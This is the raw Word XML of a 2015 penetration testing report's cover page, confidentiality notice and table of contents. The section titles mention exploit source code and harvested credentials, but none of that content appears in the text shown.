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AB7A8" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035D71C7" wp14:editId="32E29E75">
            <wp:extent cx="2805402" cy="996043"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 0" descr="infose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eclogo.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2822080" cy="1001965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14246F4B" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRPr="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A"/>
    <w:p w14:paraId="54CE39C1" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRPr="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A"/>
    <w:p w14:paraId="068A9315" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRPr="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D394AAC" w14:textId="59457C5F" w:rsidR="00A6365B" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30B6A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C14052" w14:textId="16006BCE" w:rsidR="001A6D81" w:rsidRDefault="001A6D81" w:rsidP="00F30B6A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Prepared for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD74A3" w14:textId="29348877" w:rsidR="001A6D81" w:rsidRPr="00F30B6A" w:rsidRDefault="001A6D81" w:rsidP="00F30B6A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>IACRB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43552507" w14:textId="77777777" w:rsidR="00DE04A6" w:rsidRDefault="00DE04A6" w:rsidP="00DE04A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246393CD" w14:textId="599BA6A6" w:rsidR="00DE04A6" w:rsidRPr="00DE04A6" w:rsidRDefault="00DE04A6" w:rsidP="00DE04A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Sunday, June 14, 2015</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140923A9" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRPr="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA9C0B8" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRPr="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30B6A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ATTENTION:  This report contains confidential information and should only be viewed by authorized persons.  Additionally techniques and    tools discussed and demonstrated in this report should not be shared with entities other than the party for which this report was prepared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CFBCE" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F510AA" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRDefault="00F30B6A" w:rsidP="00F30B6A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="-1717735124"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="6F7A278F" w14:textId="06360C96" w:rsidR="00B66E87" w:rsidRDefault="00B66E87">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="75EF9F40" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="00B66E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2058349" w:history="1">
            <w:r w:rsidR="000328A1" w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EXECUTIVE SUMMARY</w:t>
            </w:r>
            <w:r w:rsidR="000328A1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000328A1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000328A1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058349 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000328A1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000328A1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000328A1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="000328A1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04BD5D87" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058350" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPROACH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058350 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FB9C082" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058351" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SCOPE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058351 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="441B2B78" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058352" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>KEY FINDINGS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058352 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="615F782D" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058353" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>RECOMMENDATIONS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058353 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26925188" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058354" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TECHNICAL REPORT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058354 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="564E998F" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058355" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Target Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058355 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2065E3E9" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058356" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack Details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058356 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FE516C4" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058357" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CONCLUSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058357 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12A75517" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058358" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX 1: Definitions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058358 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38781ECF" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc422058359" w:history="1">
            <w:r w:rsidRPr="005404D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX 2: Exploit Source Code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc422058359 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18597D73" w14:textId="77777777" w:rsidR="00E56EA6" w:rsidRDefault="00B66E87" w:rsidP="00E56EA6">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="508028CA" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="008C4A6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22058347" w:history="1">
        <w:r w:rsidR="000328A1" w:rsidRPr="00B33FB8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 1: Open Ports</w:t>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058347 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FA99AB5" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058348" w:history="1">
        <w:r w:rsidRPr="00B33FB8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2: Harvested Passwords</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058348 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C5B1402" w14:textId="77777777" w:rsidR="008C4A66" w:rsidRDefault="008C4A66">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAA342" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="00E851B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22058360" w:history="1">
        <w:r w:rsidR="000328A1" w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1: Harvest cptvm2 root Credentials</w:t>
        </w:r>
        <w:r w:rsidR="000328A1">
